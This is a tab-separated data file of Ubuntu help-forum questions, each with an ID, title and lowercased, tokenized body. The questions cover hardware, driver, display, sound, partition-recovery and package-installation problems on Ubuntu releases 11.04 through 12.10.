216720	arandr/external monitor freezing/crashing xubuntu 12.10	i tried to get my external monitor working through arandr since enabling it though the settings manager had no effect - the screen simply stayed blank . however , if i run arandr and turn on the external monitor i get extremely frequent ( within 5-10 minutes ) complete system freeze requiring me to depower the machine and restart . no error reports are generated . anyone else had this problem ? any ideas about solutions ? i simply want to run my dell 17 '' as the only monitor instead of my tiny netbook screen - no dual screen or anything . either duplicate or replacement would be fine . thanks , complete noob
216721	connect 4.1 speakers to acer v3-571g with ubuntu 12.10	i have the acer aspire v3-571g that has only 2 audio jack : 1 for headphone and 1 for microphone . can i connect my creative 4.1 speakers and have sound in all 5 channels ? the problem is that speakers have a double green/black wire for front/rear channel but pc has only 1 jack . is it possible to use microphone jack to export sound instead of import ?
216725	how can i remove web-apps ? ( not thewhole feature , but certain web-apps )	how can i remove web-apps ? ( not the whole feature , but certain web-apps )
216726	what is the application that displays notifications in lubuntu 12.04 and how to remove it ?	i get all the time notifications in the upper right corner and as a tray icon for all kind of actions , especially downloads . what app is that in lubuntu ? ( it is not notify-isd ) is it possible to set what notifications to see ? if not , how to remove this completely ? update edit : removing notification-demon ( that being it seems the culprit , as an answer suggests ) involves removing some important applications : lubuntu-desktop is a metapackage i guess . but what about removing deluge and update-notifier ? can i add these back without getting back the notifier ? ? i do not want in any case to remove these two .
216734	displaying two subtitle tracks simultaneously	is there a way to display multiple subtitles at the same time ? it would help a lot while learning a new language . i have some *.mkv movie with two embedded subtitles , how would i turn them both on , so that one will be on the bottom and another one on the top ? or at least a fast switch with immediate text update without rewinding back would be nice .
216737	unable to write in mounted drive kubuntu 12.10	i installed kubuntu 12.10 in ssd but unable to use hdd because i do not have write permission . kisun @ ejo129 : ~ $ sudo fdisk -l [ sudo ] password for kisun : warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 64.0 gb , 64023257088 bytes 255 heads , 63 sectors/track , 7783 cylinders , total 125045424 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sda1 1 125045423 62522711+ ee gpt warning : gpt ( guid partition table ) detected on '/dev/sdb ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sdb : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdb1 1 1953525167 976762583+ ee gpt partition 1 does not start on physical sector boundary . i am novice linux user . could you please suggest me how i can get rid of this problem ?
216739	thunderbird sends pdf as plain/text	i am under lubuntu 12.10 with thunderbird 16.0.2 when i send a pdf file , people who receive it can not open this pdf with acrobat or evince . it appears that in the source of the mail , thunderbird said that my pdf file is a plain/text file instead of a binary or a pdf file . i look at this http : //kb.mozillazine.org/send_plain_text_attachments_as_real_attachments but it does not solve my problem .
216740	ubuntu 12.04 - how can i have eth0 and wlan0 both active where eth0 is primary and wlan0 is just for internet browse	i have a box running ubuntu 12.04 . there i have eth0 which is used as local network no internet . but i have also in that same box wlan0 , and wifi availability . now how can i have both interface active ? so that eth0 remain as it is , but wlan0 also get auto active to specific wifi as fixed . when ever internet inbound/outbound access requires , i want to use wlan0 interface , not the eth0 interface as it is used already for webservice in local networks . any ideas how to achieve this ? ( i tried this but not working for both interface https : //help.ubuntu.com/community/wifidocs/wifihowto )
216741	ubuntu.com download of ubuntu 12.10 failing	i 've been trying to download wubi as well as the normal iso for 12.10 and after 30 seconds of loading i get oops ! google chrome could not connect to glug.nith.ac.in is some known issue going on ?
216746	dependency not satisfiable - offline deb package install	i have a new installation that has no chance of an internet connection . since i want to add a few development software packages , i downloaded a few *.deb files . the problem is that for every package i try to install i get the same error : '' dependency not satisfiable ... . '' also downloaded other versions of that software ( the deb files ) but it did n't work . i 've researched other questions in here and google and i have n't been able to solve this yet .
216750	after ubuntu upgrade , can not connect to wifi ( wireless )	i upgraded my ubuntu os from an iso . initially , my connection kept on dropping . after a while , ubuntu failed to connect to wireless at all .
216753	ubuntu slow - what architecture does the windows installer install ?	i feel absolutely limited by using windows , and i need to switch to a unix environment . i once installed red hat on my laptop ( screen + external monitor setup ; 4gb ram ; x64 ) and it worked fine , but i saw that the computer cluster that is the birthplace of my unix knowledge switched to ubuntu , so naturally i follow . to the point . when i installed ubuntu onto my machine via the windows installer , it ran quite slow . opening firefox takes about 8-9 seconds , it freezes up often , unable to handle its own background processes . i saw in a thread that , perhaps , it is running slow because the windows installer is installing an x64 version . of course , my computer has had no performance issues in the past ( except that time with the trojans but you know , no one is perfect ; ) ) anyways , i uninstalled ubuntu , freeing up the max allocated memory it took up , and continue to be sad , trapped in my ms world with only a buggy cygwin , any assistance is greatly appreciated ! : ) thanks ~ben
216759	how to set libreoffice to suggest corrections in english-uk in lubuntu 12.04 ?	i want to be given correction suggestions while setting a text in libreoffice to english-uk . now it works for english-us , french and romanian , as these are the languages that i have installed in language support . i can not seem to have a setting to differentiate us/uk english as i was able in xubuntu . in libreoffice english-uk is absent . how to add it ? in tools/options/language settings/languages i get to the image above , but how to make english uk present there ? it lacks that 'abc-v ' sign that is present for english usa , although in tools/options/language settings/writing aids an 'english-uk ' is present . but that is not enough for the corrector to function for english-uk .
216767	how to install google chrome from the official repos ?	i followed this question : how to install chrome browser properly via command line ? however , it is not the same as the one mentioned in google 's website : http : //www.google.com/linuxrepositories/ i want to do this one instead . the process is : on an apt-based system ( debian , ubuntu , etc . ) , download the key and then use apt to install it . wget -q -o - https : //dl-ssl.google.com/linux/linux_signing_key.pub | sudo apt-key add - sudo apt-get update what would be the next step ? i tried sudo apt-get intsall google-chrome and i ended up with this error reading package lists ... done building dependency tree reading state information ... done e : unable to locate package google-chrome
216768	brightness resets to zero on an hp dm4 pavilion	everytime i reboot my hp dm4 pavillion the brightness is zero on my screen . btw i use a ubuntu 12.04..
216770	searching text on google in libreoffice ( from context menu or otherwise ) ?	is it possible to search a text in google or other search engine in firefox from context menu in libreoffice ? translating texts i need to go to the internet to look up the words and see context etc . could i do it directly from libreoffice somehow ? would look something like :
216778	how does language support work in lubuntu ?	there are a few things that i do not clearly understand concerning the way languages and language-related features are used in ubuntu . ( i 'm in lubuntu . ) they are all related and i guess i can post them together . it is clear that the first selection of the main language is done during the installation of the os . then , different languages can be installed through language support . but already here some things are unclear . opening language support i see this : english us is the language i selected during installation and that i use for my computer . but i never installed the other english languages . sub-question 1 : what are the english languages ( uk , us , south africa , australia , etc ) that are installed when selecting english as the main language ? i guess not all are . i remember that spelling for uk was missing and i had to install it separately . ( see this question . ) french and romanian are installed by me in language support . but ( sub-q 2 ) : what about the other ones ( german , chinese ) in the image above ? i see that in lubuntu i can select different keyboard layouts from the same language , display , select them and use them through the keyboard layout handler from lxpanel and that all sort of keyboard layouts can be added for languages that are not installed . so , a certain part of the language-support ( namely keyboard layouts ) is installed although languages themselves ( displayed language of system and programs ) are not . what about spelling , thesaurus and such ? sub-q 3 : what is the relation between language support for programs and the spelling in different languages in text editors and internet browsers ? installing languages in language support means installing support for system and programs in those languages and at the same time for spelling and other features in text editors ? beside the english-uk spelling issue ( see comment below ) i was also intrigued by how keyboard support works and is set . now i understand how to set that ( see question and answer ) but i would like a clear cut presentation of the way in which are related these three elements : languages installed in language support , spelling/correctors ( spellcheckers , thesaurus and so forth ) in text editors and internet browsers and keyboard layouts .
216780	garbled text in terminal , titles and other places after upgrade to 12.10	after upgrading to ubuntu 12.10 i am getting sporadic garbled text in the terminal , but it is also appearing in titles and occasionally the url bar of chrome . amazingly i was able to catch a screenshot with it scrolling up and down will usually fix this . what could the problem be and how could i fix it . details of rig : custom built core i7 970 ubuntu 12.10 nvidia gtx 480
216782	play game on virtualbox	i would know what you think about playing games on ubuntu with virtualbox . is it really like a windows installation ? thanks and sorry for my bad english .
216783	ubuntu 12.10 `` turn screen off when inactive for : never '' still turns off	after a fresh install of ubuntu 12.10 , my screen still goes off after about ten minutes . i 've been to the brightness and lock control panel . the turn screen off when inactive for : setting is set to never . i 've been through the dconf editor searching for power , screen , and idle changing parameters . this does n't seem to have any effect on the display timeout . here 's one more interesting thing , the screen does n't go off , it just goes black . the back lighting is still on , and all the pixels are black . when it goes black , it does a very pleasant quick dim to black . similarly , it quickly un-dim 's after a key press , mouse movement , or mouse click .
216786	sharing mac files vmware fusion	i have ubuntu running on vmware fusion on my macbook pro . i ca n't seem to access files on the mac . i have tried looking into /mnt/hgfs but there is nothing there . i have been to settings and said that it should share certain folders on the mac to no avail .
216787	how to install , select and use different keyboard layouts of the same language in lubuntu ?	in lubuntu 's language support application i see no way of differentiating between different types of the same language ( english us , uk , etc ) nor between different types of keyboard layouts for the same language ( standard , etc ) . to select a certain special keyboard layout i had to edit manually /etc/default/keyboard . all that was possible by gui when i used xubuntu , and i think all that is available in ubuntu proper . can i do that in lubuntu or do i have to install a new application ?
216788	can not chmode and chown on a ntfs usb drive	i have an ntfs formatted usb drive , on this disk i used to backup using rsync and with 12.04 everything worked . i 've done a 12.10 64 bit fresh install , now when i plug the drive and select open with file manager the dribe is mounted as rw -- -- -- - for my user . i can create files , i can delete files , but i can not chown or chmode the files , moreover the rsync saved access rights are completely masked . what can i do to restore my data with the original access rights and owners ?
216792	is 12.10 ready from prime time ?	i recently installed 12.10 - dual boot using wubi . i had numerous stability problems : many sporadic , unaccounted for system errors , software that was installed and then seemed to disappear from app launcher , etc . machine is new hp quad with 4 gig memory - wonderful piece of hardware - definitely no hardware problems there . i went back to 12.04 ( installed from iso image , not wubi ) and it 's rock solid - never any issues at all . new to linux/ubuntu after 20 years on ms/windows and loving it - i develop in c++ and python - maybe will try lazarus since i know delphi . would like to use the latest and greatest ubuntu but i will not sacrifice stabilty . are there known stabilty problems with 12.10 ? would using the standard install instead of wubi help ? seems a lot of users are voting down this question - not sure why since other users have confirmed problems .
216796	unable to find the enterprise cloud option during server boot	i 've installed ubuntu server 12.04 on vmware . when i 'm booting i ca n't find the enterprise cloud option . do i have to change the ubuntu version ( though i prefer to use 12.04 lts ) , or is there another place i should look ?
216800	a disk read error occured . press ctrl+alt+del to restart	i 'm new to linux world . just downloaded ubuntu and installed it alongside with windows 7 . in grub when i choose ubuntu , it opens with no problem , but when i try to open windows 7 , this message appears : a disk read error occured . press ctrl+alt+del to restart . i googled for that problem which directed me to download a boot repair tool , when i choose : advanced options / retore mbr -- > apply , then restart computer , it boot to win 7 without loading the grub menu . then i opened the live ubuntu from a usb , launched the `` boot repair '' again , choose : recommended repair , then restart , it returns to the first problem , grub menu appear , from which i can choose only ubuntu , but win 7 show this msg again : a disk read error occured . press ctrl+alt+del to restart . i repeated more and more with the same results ... what should i do ? i created a boot info summary using the `` boot repair tool '' if this can help , it 's in this url .
216801	5.1 surround sound with three 3.5mm jacks	having an issue with sound at the moment . i am trying to configure my 5.1 surround sound but it will only work on the front left and front right speakers . on the back of my motherboard i have 3x3.5mm jacks which i have connected the speakers to although these are not the right ports . i want to `` assign '' the three ports on the back to each output ( sub and centre , left and right , and rear left and right ) although i 'm not sure how to do this . my audio is alc889 from realtek and am using ubuntu 12.04 with all updates installed .
216803	how to limit gwibber and gwibber lens messages	the number of messages both in gwibber and also in the gwibber lens ( i guess it is the same ) in 12.10 are growing and growing ( > 900 ) . how can i limit the number of displayed messages ? no , i do n't want to filter them . i just want to see the recent 100 for example . seems that gwibber has also problems with a high amount of messages ; it gets very slow .
216804	want to execute sudo command on shell startup	i 've put a command sudo do something in my ~/.bashrc , this works but everytime i open the terminal i have to type in my password . how do i make it so there is no password-typing ?
216808	firmware/driver for broadcom wifi card , powerbook g4 running ubuntu 12.04	this is my first time working with ubuntu ( or linux ) , so please be patient . i am running ubuntu 12.04-powerpc `` precise pangolin '' on a mac powerbook g4 with 1.67ghz processor . the firmware/driver for the wifi card is missing . for reasons not worth explaining , i can not physically plug the computer into the network . i have another computer , a macbook pro running osx , from which i can download files and port them by usb thumb drive . the wifi card in the powerbook g4 is by broadcom . the chip is bcm4306 , rev . 3 . the pci number is 14e4:4302 . i have downloaded b43-fwcutter_015-14_powerpc.deb and dropped it into the home folder on the ubuntu machine . however , it will not install . when i double-click , it opens with ubuntu softwarecenter , but the `` install '' button is inactive : i ca n't click it . there 's a message beside the inactive button saying , `` an older version of 'b43-fwcutter ' is available in your normal software channels . only install this file if you trust the origin . '' if i `` right-click '' the .deb file and open with archive manager , it shows me the `` debian '' and `` usr '' folders , but i 'm unsure what to do from there ... and fairly certain this is not the right way to do things . maybe i have the wrong version of b43-fwcutter for my machine/version of ubuntu ? the documentation for this problem is a mess . it refers to all sorts of out-of-date ubuntu versions and to an array of different `` cutter '' and firmware files . maybe i 'd be able to figure this out if i were a more seasoned ubuntu user , but i have no idea why sofware center wo n't let me do the install . i would be very grateful for an explanation of how to get the wifi card working on this machine again . thank you !
216812	ltsp : fat client with motion - > dropbox upload	i would like to install motion on my ltsp fat clients , which actually works well . what i do n't know is how to upload the created files via dropbox . can someone point me in the right direction ? i tried to install dropbox from within the fat client , but the user has no sufficient rights and i think it would get lost at reboot anyway . i tried to install from within the chroot , but that did not work . i installed it in the main ( auto login ) account on the server but you apparently can not inclued subfolders from other users accounts . i tried mount a nfs folder from the chroot for the fat client users to put the files somewhere within the files of the main account on the server so that its dropbox installation can upload it , but with no success .
216815	make evolution open pdf instead of the tmp directory	running ubuntu 12.04 with gnome 3.2 . scenario : when i double click a pdf attachment in evolution , it opens up the ~/.cache/evolution/tmp/ directory in nautilus instead of opening the pdf . if i right click the pdf-preferences i see that correct application is set for pdfs . how can i make evolution open the pdf with the default application automatically ?
216817	how benchmark ubuntu server ?	hey i have ubuntu server 12.04 and i want to benchmark it . i found something called nbench but it 's old . i need something that measure my cpu , ram and hdd . i also installed phoronix test suite but i search for tests but every one is 500mb+ and i do n't have that much space . what do you recommend ?
216818	how do i use plugins in the vim-scripts package ?	what is the correct way to include the plugins that are part of the vim-scripts package ? nothing from the vim-scripts folder seems to be included automatically . plugins in /usr/share/vim/vim73 are available , plugins in /usr/share/vim-scripts are not .
216819	how to install ms fonts on ubuntu ?	i did sudo apt-get install ttf-mscorefonts-installer and it seems it is successfully . but why i am not seeing new fonts ? ( e.g . when i got to select font in my profile for my terminal ) ? $ sudo apt-get install ttf-mscorefonts-installer [ sudo ] password for cheungs : reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : ttf-mscorefonts-installer 0 upgraded , 1 newly installed , 0 to remove and 387 not upgraded . need to get 0 b/27.4 kb of archives . after this operation , 133 kb of additional disk space will be used . preconfiguring packages ... selecting previously unselected package ttf-mscorefonts-installer . ( reading database ... 198874 files and directories currently installed . ) unpacking ttf-mscorefonts-installer ( from ... /ttf-mscorefonts-installer_3.4ubuntu3_all.deb ) ... mscorefonts-eula license has already been accepted processing triggers for fontconfig ... processing triggers for update-notifier-common ... ttf-mscorefonts-installer : downloading http : //downloads.sourceforge.net/corefonts/andale32.exe ttf-mscorefonts-installer : downloading http : //downloads.sourceforge.net/corefonts/arial32.exe ttf-mscorefonts-installer : downloading http : //downloads.sourceforge.net/corefonts/arialb32.exe ttf-mscorefonts-installer : downloading http : //downloads.sourceforge.net/corefonts/comic32.exe ttf-mscorefonts-installer : downloading http : //downloads.sourceforge.net/corefonts/courie32.exe ttf-mscorefonts-installer : downloading http : //downloads.sourceforge.net/corefonts/georgi32.exe ttf-mscorefonts-installer : downloading http : //downloads.sourceforge.net/corefonts/impact32.exe ttf-mscorefonts-installer : downloading http : //downloads.sourceforge.net/corefonts/times32.exe ttf-mscorefonts-installer : downloading http : //downloads.sourceforge.net/corefonts/trebuc32.exe ttf-mscorefonts-installer : downloading http : //downloads.sourceforge.net/corefonts/verdan32.exe ttf-mscorefonts-installer : downloading http : //downloads.sourceforge.net/corefonts/webdin32.exe these fonts were provided by microsoft `` in the interest of cross- platform compatibility '' . this is no longer the case , but they are still available from third parties . you are free to download these fonts and use them for your own use , but you may not redistribute them in modified form , including changes to the file name or packaging format . extracting cabinet : /tmp/tmpkizjn9.exe extracting fontinst.inf extracting andale.inf extracting fontinst.exe extracting andalemo.ttf extracting advpack.dll extracting w95inf32.dll extracting w95inf16.dll all done , no errors . extracting cabinet : /tmp/tmpscrkmp.exe extracting fontinst.exe extracting fontinst.inf extracting ariali.ttf extracting arialbd.ttf extracting arialbi.ttf extracting arial.ttf all done , no errors . extracting cabinet : /tmp/tmpbj6o_k.exe extracting fontinst.exe extracting fontinst.inf extracting ariblk.ttf all done , no errors . extracting cabinet : /tmp/tmppcr86z.exe extracting fontinst.inf extracting comicbd.ttf extracting comic.ttf extracting fontinst.exe all done , no errors . extracting cabinet : /tmp/tmpohqpyy.exe extracting cour.ttf extracting courbd.ttf extracting courbi.ttf extracting fontinst.inf extracting couri.ttf extracting fontinst.exe all done , no errors . extracting cabinet : /tmp/tmp4d_sd6.exe extracting fontinst.inf extracting georgiaz.ttf extracting georgiab.ttf extracting georgiai.ttf extracting georgia.ttf extracting fontinst.exe all done , no errors . extracting cabinet : /tmp/tmpwcfmal.exe extracting fontinst.exe extracting impact.ttf extracting fontinst.inf all done , no errors . extracting cabinet : /tmp/tmpdbzrj6.exe extracting fontinst.inf extracting times.ttf extracting timesbd.ttf extracting timesbi.ttf extracting timesi.ttf extracting fontinst.exe all done , no errors . extracting cabinet : /tmp/tmpu_gd4c.exe extracting fontinst.exe extracting trebuc.ttf extracting trebucbd.ttf extracting trebucbi.ttf extracting trebucit.ttf extracting fontinst.inf all done , no errors . extracting cabinet : /tmp/tmplibv4g.exe extracting fontinst.exe extracting fontinst.inf extracting verdanab.ttf extracting verdanai.ttf extracting verdanaz.ttf extracting verdana.ttf all done , no errors . extracting cabinet : /tmp/tmp_4wdye.exe extracting fontinst.exe extracting webdings.ttf extracting fontinst.inf extracting licen.txt all done , no errors . all fonts downloaded and installed . setting up ttf-mscorefonts-installer ( 3.4ubuntu3 ) ...
216823	command-line / virtual terminal issue	i 've recently got into ubuntu , still learning using the terminal . i decided to try initiating the command-line on boot by editing boot commands to quiet splash text or quiet splash nomodeset only to find that neither works . i 've tried starting the virtual terminal with ctrl + alt + f ( 1-6 ) - again , with no success . using the text line , i get a blank black screen on boot . using the nomodeset line , i get a somewhat random color on my screen . ctrl + alt + f ( 1-6 ) goes into a blank black screen as well , similar to the text boot . i 've tried suggested fixes , however , with no success . any help would be appreciated . regards
216825	recovering deleted ext4 ubuntu partitions using testdisk ( none partition media table type )	all screenshot images in one album : http : //imgur.com/a/gqpio # 0 ( updated : added deep search results ) question how do i write ( recover ) found partitions from [ none ] none partition media table type ( unallocated space ? ) in testdisk ? problem i changed grub settings ( default entry to boot into from 0 to 4 ) , then run the command sudo update-grub . i rebooted my computer . it bypassed the grub menu automatically and entered the `` acer recovery manager '' ( for windows 7 ) . i canceled it because i did not want to recovery windows 7 . i rebooted the computer again . this time i encountered : error : no such partition . grub rescue > i booted into ubuntu 12.10 live and run `` gparted partition editor '' . image 0 ( image album link provided above ) instead of unallocated space , i used to have / and /home ext4 ubuntu partitions . i think the `` acer recovery manager '' deleted ( hide ) them even though i canceled the process . recovering missing partitions using testdisk image 7 : this partition table is not the correct ( desired ) table ( not the one i want ) . image 10 : so far , i did not find the missing partitions ( above ) . i did not do deep search yet . i continued the search in [ none ] none partitioned media table type ( below ) . image 15 : this is the correct ( desired ) partition table i want . the two ext4 partitions that is now converted into unallocated space . i want to recover these two . image 16 : i found the missing / ext4 ubuntu partition ( above ) . image 19 : i found the missing /home ext4 ubuntu partition ( above ) . image 21 : i found the missing / and /home ext4 ubuntu partitions but since i am in [ none ] none partitioned media table type , i can not write ( recover ) the partitions ( no option to write ) . updates : image 24 : i found the same /home in the deep search also ( above ) . the deep search was done while i was still in [ none ] none partitioned media table type , maybe this is why i ca n't write or recover . image 28 : i found the same / in the deep search also ( above ) . the deep search was done while i was still in [ none ] none partitioned media table type , maybe this is why i ca n't write or recover . conclusion how can i recover these two partitions that are found in [ none ] none partitioned media table type ( unallocated space ? ) and also in deep search ? i have searched around and have not found anything that refers to recovering found partitions in [ none ] none partitioned media table type . updates : i did not run the deep search while in [ intel ] but i did run the deep search in [ none ] ( which i thought was the same ) . the results are in images 24 and up ( hundreds of results was listed from which i found my partitions by comparing the numbers with that of quick search results in [ none ] ( image 15 ) . but i was not able to write anything . so i found the numbers ( start , ending , and size ) which would be useful in advanced or manual recovery but i do not know how to use them . at the end , i just recovered some of the data from the partitions and re installed ubuntu . i wanted to recover the partitions because i did not want to install applications , modify settings , and add accounts over again . this question is closed from my side .
216827	where to save yelp files ?	i 've written some yelp pages using mallard . now i would like to know where to save them correctly in the file system ( packaging ) . the saved yelp files should be displayed when opening yelp - > go - > all documents too . addition : it 's kind hard to find information about that kind of stuff . do you know a good place where to find such information ?
216836	canon ip4900 driver	i have new canon ip4900 and used the driver supplied to set up on my desk top , but i have a second pc but when i try to set it up on the second pc , the driver comes up in what appears to be arabic , with no way of changing to english . i have tried a download driver , but this does the same . as it 's set up ok in english on one pc , would it be that my second pc has a language problem ? everything else i 've loaded on this pc is in english ok. any ideas ?
216838	fglrx causes fallback mode , does n't work	i made a fresh install to ubuntu 12.10 a while ago and tried to install the fglrx via software-properties-gtk . but when i install and restart one of the new versions , i ca n't acces unity ( only desktop is there , no launcher or dash or window frames ) , and gnome3 only in fallback mode ( automatically ) . also the graphics does n't seem to be fast , e.g . when i 'm scrolling in software center . ( i want to use gnome3 . ) so i do n't think the drivers actually 'work ' . the drivers worked on 12.04 . but i want to avoid a downgrade , since the newest gnome3 version only seems to be in the 12.10 repositorys . i have no idea about what is wrong . any ideas ? or anything i have to take care of with the new driver selection in software-properties-gtk ? my graphics card : radeon hd 6870 -- - os : ubuntu 12.10 when i try to install the ( stable ) driver from the amd website , the following error message occures in it 's log file : supported adapter detected . check if system has the tools required for installation . fglrx installation requires that the system have kernel headers . /lib/modules/3.5.0-18-generic/build/include/linux/version.h can not be found on this system . one or more tools required for installation can not be found on the system . install the required tools before installing the fglrx driver . optionally , run the installer with -- force option to install without the tools . forcing install will disable amd hardware acceleration and may make your system unstable . not recommended .
216840	ubuntu - > lubuntu ?	not too long ago i switched from windows 7 to ubuntu 12.04 ( 64-bit ) on my laptop , which only has a amd dual-core e1-1200 apu 1.4 ghz processor but 4gb ram , in the hopes that i would get more out of my weak cpu . i wonder if i could do anything further to get more out of my hardware , so i thought maybe i could switch to xubuntu or lubuntu . i know for example lubuntu is much lighter on the ram but since i have plenty of that ( relatively speaking ) is there a point to switching or is it a waste of time ? if it is adviced for me to switch , to which version ? also , is there a big difference in cpu intensity between 32-bit and 64-bit ? since i am new to the world of linux in general i 'll take any advice i can get . thanks a bunch !
216841	how to uninstall teamviewer 7 -- package does n't appear in the software center	i previously installed teamviewer 7 on my ubuntu 12.04 32-bit system . however , now i 'd like to uninstall it , and i do n't see an easy way to do it . normally , i 'd look in the ubuntu software center , but in this case the program is n't there . how can i uninstall it ?
216844	brasero yields `` scsi error on write ( 1248864 , 16 ) ''	i was using brasero to burn a win7 .iso for a friend ( sorry , could n't convince him to try linux e.e ) and when it was at 80 % the process stopped with a `` scsi error on write ( 1248864 , 16 ) '' . i burnt some dvds a day or two ago and it worked perfectly , and i know for sure the error is n't caused by the .iso file . i 'm using a dvd from a pack i bought today , they 're verbatim dvd+r , while the other day i was using dvd-r. my computer is pretty old but i changed the dvd burner a couple of years ago or so , and dvd+r are supposed to be compatible with more dvd players , so i ca n't guess where 's the error . i 'm using ubuntu 12.04 . any idea will be welcome . thank you . ps : and please , ask me for information in case you needed it .
216845	manually installing ia32-libs-multiarch on ubuntu 12.10 64bit	i manually downloaded ia32-libs-multiarch from packages.ubuntu.com and the version should be compatible with the 64bit 12.10 . from terminal , i get a 'package has no installation candidate . after several manual attempts with dpkg , i tried manually installing ia32-libs from here , but failed . what is the correct way to install ia32-libs ?
216846	unable to get point grey usb camera working	i have problem in using point grey firefly mv fmvu-13s2c digital camera to work on ubuntu 11.04 . this is the version of ubuntu . adrian @ ubuntu : ~ $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 11.04 release : 11.04 codename : natty as far as i know , point grey firefly mv fmvu-13s2c uses ieee1394 interface to transfer data with computer . so i downloaded the coriander â the linux gui for ieee1394/firewire cameras . however , when i plugged in the camera and launched the coriander , this error appears : warning : could not find a digital camera on the bus . please check that : -the cables are properly set -the devices on the bus are properly powered -your camera is compliant with the digital camera specs ( see http : //www.1394ta.org ) . then i run the command lsusb : adrian @ ubuntu : ~ $ lsusb bus 003 device 002 : id 1e10:2002 point grey research , inc . bus 003 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 002 device 004 : id 17ef:1003 lenovo integrated smart card reader bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 007 : id 04f2 : b217 chicony electronics co. , ltd bus 001 device 006 : id 0a5c:217f broadcom corp. bluetooth controller bus 001 device 005 : id 147e:2016 upek biometric touchchip/touchstrip fingerprint sensor bus 001 device 004 : id 046d : c52b logitech , inc. unifying receiver bus 001 device 003 : id 0765:5001 x-rite , inc . bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub apparently , the first output is the camera . then i guess maybe i need to configure udev to work with camera . so i run sudo gedit /etc/udev/rules.d/10-pointgrey.rules and type in the following text : bus== '' usb '' , sysfs { idvendor } == '' 1e10 '' , sysfs { idproduct } == '' 2002 '' , group= '' plugdev '' then i restart the udev by sudo restart udev and restart coriander again . but the same error still appears . then i opened the official website of the point grey and downloaded the flycapture2 software . surprisingly , this software is able to recognize the camera . why coriander can not recognize camera ? camera1394 ros node also can not recognize camera . can any help me to solve this problem ? thanks in advance .
216852	internal floppy will not automatically mount	i can not get the floppy drive to auto mount in natty 11.04 . i can mount it using udisks -- mount /dev/fd0 in a terminal . iwas told that all recent versions of ubuntu have same problem and that i would need to change back to an older version of udisks . i was told to look for version 1.0.1 in syaptic pk mng but it only shows ver 1.0.2 any help on where to get sdisks ver 1.0.1 or other fix would be great . thanks . p.s . fairly new to ubuntu so easier is better
216857	how do i uninstall cinnamon ?	so i installed the cinnamon desktop environment on ubuntu 12.10 but now i want to uninstall it . what would the command line ( s ) be to uninstall it ?
216865	vitualbox nat stopped working after ubuntu upgrade to 12.10	after upgrading to 12.10 from 12.04 none of my virtualbox virtual machines can use nat to access the network . i have tried vboxmanage modifyvm -- natdnsproxy1 on and/or -- natdnshostresolver1 on , but still does n't work . what can i do to resolve this ? i have also upgraded to virtualbox 4.2.4 to attempt to resolve this issue .
216866	lightning 1.8 in thunderbird 16.0.2 does n't work under ubuntu 12.10	i just had to redo my laptop and choose ubuntu 12.10 ( had 12.04 before ) . now i encounter a problem with lightning , the calendar app for thunderbird . my thunderbird is of version 16.0.2 and i installed lightning right from the add-ons site inside tb it is of version 1.8 . anyway i can not do anything in lightning . i can not open the properties of a calender , it actually wo n't even properly show the calendar grid at all . not even the default calendar `` private '' works . any help is greatly appreciated ! thank you . -jakob .
216868	how to recursively delete files filled with zeros ?	i have many files in a folder tree , of which some are filled with zeros and others are real files . how can i delete files filled with zeros recursively ?
216869	will i get ubuntu working with a gma3650 graphics card ?	thinking of buying a netbook , will i get it working easily on a netbook with a n2800 chip and an intel gma 3650 graphics card ?
216873	how do i access the startup processes if there is no cinnamon desktop shown ?	i just recently switched my system over to ubuntu 12.10 , and decided on cinnamon as my environment -- it all worked fine , at first . but i was poorly educated and started using compiz and emerald along with it -- setting both as replacements in startup processes . i now know , that 's a big , big mistake . now when loading cinnamon , i am greeted to my background image , and only that . my only options seem to be to open a terminal . i was advised to attempt muffin -- replace and mutter -- replace neither to any avail , the terminal closes , and i can not load another one unless i completely reload . i went back to unity , purged and autoremoved cinnamon , emerald , and compizconfig , and attempted to reinstall cinnamon , thinking that would solve the problem -- no , it came back just as broken as before . so , i reinstalled ubuntu , then cinnamon -- -still broken . i 'm assuming i must find a way to remove the replace commands -- but as i have no menu , i 'm not positive i can do that . is there any way i can access the startup processes via terminal ? i 'd think though , if i completely removed cinnamon , all configurations would be gone too , so , it 's just not making much sense . is there some kind of reset i could possibly do ? i 've been browsing forums and questions here , all leading to things i 'd already done , so , it ca n't hurt to ask for myself . i apologize if you would rather i have posted this over at mint . next time , i will definitely check compatibility instead of assuming something just has to work . any help is greatly appreciated , thanks !
216874	problems with brightness and video card on an hp compaq 6735b	i am kind of new to the linux world . i installed ubuntu 12.10 a couple of weeks ago to use vim but i 've been having some issues . i have a hp compaq 6735b , 2.2 ghz amd turion ( tm ) x2 dual core mobile rm-70 ă 2 , 2.7 gb ram ddr2 , ati radeon hd 3200 serie . basically the problem i 'm having is first of all installing the correct driver of my video card because it still says unknown . second of all i can not adjust my system 's brightness . i have shorcuts on windows for fn + f9 and fn + f10 and they `` occasionally '' work on ubuntu but most of the time they do not work and there is n't a brightness bar in the system settings . thanks in advance !
216875	how to fix additional sta driver installation error on 12.04	i have a broadcom bcm4313 wireless driver . it worked fine under 11.04 and the upgrade to 11.10 also went smoothly . the 12.04 upgrade has broken the wireless connection . i 've seen several posts about this and all presume you can activate the sta drivers , but that 's where it fails on this machine . the log is in /var/log/jockey.log : warning : modinfo for module wl failed : error : modinfo : could not find module wl warning : /sys/module/wl/drivers does not exist , can not rebind wl driver debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted ( repeat of last error several times ) any ideas how to proceed ?
